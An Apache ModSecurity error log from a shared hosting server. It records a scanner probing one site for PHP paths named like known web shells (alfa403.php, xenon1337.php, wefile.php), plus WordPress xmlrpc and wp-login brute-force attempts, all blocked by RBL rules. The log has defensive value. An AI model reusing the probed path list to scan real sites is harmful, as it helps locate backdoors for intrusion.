[Tue May 26 17:26:49.059742 2026] [security2:error] [pid 882219:tid 882414] [client 20.197.193.33:58449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWKgZ8tTkZcqimiXcQKNQAAAMY"]
[Tue May 26 17:26:49.059893 2026] [security2:error] [pid 882219:tid 882414] [client 20.197.193.33:58449] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWKgZ8tTkZcqimiXcQKNQAAAMY"]
[Tue May 26 17:26:49.159797 2026] [security2:error] [pid 882219:tid 882351] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKgJ8tTkZcqimiXcQKLwAAAIc"]
[Tue May 26 17:26:49.531619 2026] [security2:error] [pid 882219:tid 882352] [client 20.197.193.33:58487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWKgZ8tTkZcqimiXcQKRAAAAIg"]
[Tue May 26 17:26:49.531768 2026] [security2:error] [pid 882219:tid 882352] [client 20.197.193.33:58487] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWKgZ8tTkZcqimiXcQKRAAAAIg"]
[Tue May 26 17:26:50.003932 2026] [security2:error] [pid 882219:tid 882419] [client 20.197.193.33:58368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWKgp8tTkZcqimiXcQKUQAAAMs"]
[Tue May 26 17:26:50.004013 2026] [security2:error] [pid 882219:tid 882419] [client 20.197.193.33:58368] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWKgp8tTkZcqimiXcQKUQAAAMs"]
[Tue May 26 17:26:50.396942 2026] [security2:error] [pid 882219:tid 882463] [client 20.197.193.33:58441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWKgp8tTkZcqimiXcQKWwAAAPc"]
[Tue May 26 17:26:50.397058 2026] [security2:error] [pid 882219:tid 882463] [client 20.197.193.33:58441] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWKgp8tTkZcqimiXcQKWwAAAPc"]
[Tue May 26 17:26:50.687810 2026] [security2:error] [pid 882219:tid 882329] [remote 111.229.141.137:48390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWKgp8tTkZcqimiXcQKXAAA_G0"]
[Tue May 26 17:26:50.796403 2026] [security2:error] [pid 882219:tid 882421] [client 20.197.193.33:58439] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWKgp8tTkZcqimiXcQKZgAAAM0"]
[Tue May 26 17:26:50.796512 2026] [security2:error] [pid 882219:tid 882421] [client 20.197.193.33:58439] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWKgp8tTkZcqimiXcQKZgAAAM0"]
[Tue May 26 17:26:50.987640 2026] [security2:error] [pid 882219:tid 882354] [client 160.250.132.165:53221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujoverseas.in"] [uri "/wp-login.php"] [unique_id "ahWKgp8tTkZcqimiXcQKaAAAAIo"]
[Tue May 26 17:26:51.206885 2026] [security2:error] [pid 882219:tid 882472] [client 20.197.193.33:58472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWKg58tTkZcqimiXcQKbgAAAQA"]
[Tue May 26 17:26:51.206997 2026] [security2:error] [pid 882219:tid 882472] [client 20.197.193.33:58472] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWKg58tTkZcqimiXcQKbgAAAQA"]
[Tue May 26 17:26:51.635955 2026] [security2:error] [pid 882219:tid 882457] [client 20.197.193.33:58442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWKg58tTkZcqimiXcQKggAAAPE"]
[Tue May 26 17:26:51.636058 2026] [security2:error] [pid 882219:tid 882457] [client 20.197.193.33:58442] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWKg58tTkZcqimiXcQKggAAAPE"]
[Tue May 26 17:26:51.798227 2026] [security2:error] [pid 882219:tid 882395] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKg58tTkZcqimiXcQKeAAAALM"]
[Tue May 26 17:26:52.393437 2026] [security2:error] [pid 882219:tid 882466] [client 223.235.98.214:30800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKhJ8tTkZcqimiXcQKkQAAAPo"]
[Tue May 26 17:26:52.393543 2026] [security2:error] [pid 882219:tid 882466] [client 223.235.98.214:30800] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKhJ8tTkZcqimiXcQKkQAAAPo"]
[Tue May 26 17:26:53.029310 2026] [security2:error] [pid 882219:tid 882391] [client 20.197.193.33:58373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWKhZ8tTkZcqimiXcQKoQAAAK8"]
[Tue May 26 17:26:53.029402 2026] [security2:error] [pid 882219:tid 882391] [client 20.197.193.33:58373] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWKhZ8tTkZcqimiXcQKoQAAAK8"]
[Tue May 26 17:26:53.386274 2026] [security2:error] [pid 882219:tid 882417] [client 20.197.193.33:58369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWKhZ8tTkZcqimiXcQKsQAAAMk"]
[Tue May 26 17:26:53.386362 2026] [security2:error] [pid 882219:tid 882417] [client 20.197.193.33:58369] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWKhZ8tTkZcqimiXcQKsQAAAMk"]
[Tue May 26 17:26:53.769240 2026] [security2:error] [pid 882219:tid 882397] [client 20.197.193.33:58467] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWKhZ8tTkZcqimiXcQKvgAAALU"]
[Tue May 26 17:26:53.769355 2026] [security2:error] [pid 882219:tid 882397] [client 20.197.193.33:58467] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWKhZ8tTkZcqimiXcQKvgAAALU"]
[Tue May 26 17:26:53.800233 2026] [security2:error] [pid 882219:tid 882412] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKhZ8tTkZcqimiXcQKrQAAAMQ"]
[Tue May 26 17:26:54.202554 2026] [security2:error] [pid 882219:tid 882454] [client 20.197.193.33:58448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWKhp8tTkZcqimiXcQKwgAAAO4"]
[Tue May 26 17:26:54.202673 2026] [security2:error] [pid 882219:tid 882454] [client 20.197.193.33:58448] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWKhp8tTkZcqimiXcQKwgAAAO4"]
[Tue May 26 17:26:54.630716 2026] [security2:error] [pid 882219:tid 882380] [client 20.197.193.33:58446] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahWKhp8tTkZcqimiXcQKzwAAAKQ"]
[Tue May 26 17:26:55.355074 2026] [security2:error] [pid 882219:tid 882383] [client 20.197.193.33:58457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWKh58tTkZcqimiXcQK4AAAAKc"]
[Tue May 26 17:26:55.533048 2026] [security2:error] [pid 882219:tid 882468] [client 20.197.193.33:58446] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-admin/js/"] [unique_id "ahWKh58tTkZcqimiXcQK6gAAAPw"]
[Tue May 26 17:26:55.708854 2026] [security2:error] [pid 882219:tid 882434] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKh58tTkZcqimiXcQK3wAAANo"]
[Tue May 26 17:26:55.722793 2026] [security2:error] [pid 882219:tid 882472] [client 20.197.193.33:58457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWKh58tTkZcqimiXcQK6wAAAQA"]
[Tue May 26 17:26:55.898469 2026] [security2:error] [pid 882219:tid 882474] [client 20.197.193.33:58446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWKh58tTkZcqimiXcQK7wAAAQI"]
[Tue May 26 17:26:55.898567 2026] [security2:error] [pid 882219:tid 882474] [client 20.197.193.33:58446] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWKh58tTkZcqimiXcQK7wAAAQI"]
[Tue May 26 17:26:56.308000 2026] [security2:error] [pid 882219:tid 882410] [client 20.197.193.33:58383] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWKiJ8tTkZcqimiXcQK9gAAAMI"]
[Tue May 26 17:26:56.308163 2026] [security2:error] [pid 882219:tid 882410] [client 20.197.193.33:58383] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahWKiJ8tTkZcqimiXcQK9gAAAMI"]
[Tue May 26 17:26:56.687746 2026] [security2:error] [pid 882219:tid 882422] [client 20.197.193.33:58480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWKiJ8tTkZcqimiXcQLBgAAAM4"]
[Tue May 26 17:26:56.687871 2026] [security2:error] [pid 882219:tid 882422] [client 20.197.193.33:58480] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahWKiJ8tTkZcqimiXcQLBgAAAM4"]
[Tue May 26 17:26:57.160097 2026] [security2:error] [pid 882219:tid 882461] [client 20.197.193.33:58405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWKiZ8tTkZcqimiXcQLFAAAAPU"]
[Tue May 26 17:26:57.160212 2026] [security2:error] [pid 882219:tid 882461] [client 20.197.193.33:58405] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWKiZ8tTkZcqimiXcQLFAAAAPU"]
[Tue May 26 17:26:57.657593 2026] [security2:error] [pid 882219:tid 882354] [client 20.197.193.33:58478] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wordpress/wp-admin/maint/"] [unique_id "ahWKiZ8tTkZcqimiXcQLHgAAAIo"]
[Tue May 26 17:26:57.833792 2026] [security2:error] [pid 882219:tid 882456] [client 203.194.101.7:59560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKiZ8tTkZcqimiXcQLJQAAAPA"]
[Tue May 26 17:26:57.833957 2026] [security2:error] [pid 882219:tid 882456] [client 203.194.101.7:59560] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKiZ8tTkZcqimiXcQLJQAAAPA"]
[Tue May 26 17:26:57.853594 2026] [security2:error] [pid 882219:tid 882394] [client 20.197.193.33:58457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWKiZ8tTkZcqimiXcQLJgAAALI"]
[Tue May 26 17:26:58.050742 2026] [security2:error] [pid 882219:tid 882460] [client 20.197.193.33:58478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWKip8tTkZcqimiXcQLMQAAAPQ"]
[Tue May 26 17:26:58.050872 2026] [security2:error] [pid 882219:tid 882460] [client 20.197.193.33:58478] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahWKip8tTkZcqimiXcQLMQAAAPQ"]
[Tue May 26 17:26:58.368836 2026] [security2:error] [pid 882219:tid 882397] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKiZ8tTkZcqimiXcQLLQAAALU"]
[Tue May 26 17:26:58.678778 2026] [security2:error] [pid 882219:tid 882466] [client 20.197.193.33:58450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWKip8tTkZcqimiXcQLQgAAAPo"]
[Tue May 26 17:26:58.678933 2026] [security2:error] [pid 882219:tid 882466] [client 20.197.193.33:58450] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWKip8tTkZcqimiXcQLQgAAAPo"]
[Tue May 26 17:26:59.571649 2026] [security2:error] [pid 882219:tid 882394] [client 20.197.193.33:58485] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWKi58tTkZcqimiXcQLWwAAALI"]
[Tue May 26 17:26:59.571773 2026] [security2:error] [pid 882219:tid 882394] [client 20.197.193.33:58485] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWKi58tTkZcqimiXcQLWwAAALI"]
[Tue May 26 17:26:59.644422 2026] [autoindex:error] [pid 882219:tid 882355] [client 198.235.24.171:60422] AH01276: Cannot serve directory /home1/dprlky8f/dprassurance.lk/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:27:00.138119 2026] [security2:error] [pid 882219:tid 882428] [client 20.197.193.33:58478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahWKjJ8tTkZcqimiXcQLcgAAANQ"]
[Tue May 26 17:27:00.138227 2026] [security2:error] [pid 882219:tid 882428] [client 20.197.193.33:58478] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahWKjJ8tTkZcqimiXcQLcgAAANQ"]
[Tue May 26 17:27:00.551751 2026] [security2:error] [pid 882219:tid 882454] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKjJ8tTkZcqimiXcQLcQAAAO4"]
[Tue May 26 17:27:00.657645 2026] [security2:error] [pid 882219:tid 882369] [client 20.197.193.33:58432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahWKjJ8tTkZcqimiXcQLggAAAJk"]
[Tue May 26 17:27:00.657731 2026] [security2:error] [pid 882219:tid 882369] [client 20.197.193.33:58432] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahWKjJ8tTkZcqimiXcQLggAAAJk"]
[Tue May 26 17:27:01.081473 2026] [security2:error] [pid 882219:tid 882373] [client 20.197.193.33:58396] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-admin/css/"] [unique_id "ahWKjZ8tTkZcqimiXcQLjwAAAJ0"]
[Tue May 26 17:27:01.291220 2026] [security2:error] [pid 882219:tid 882356] [client 20.197.193.33:58457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWKjZ8tTkZcqimiXcQLmAAAAIw"]
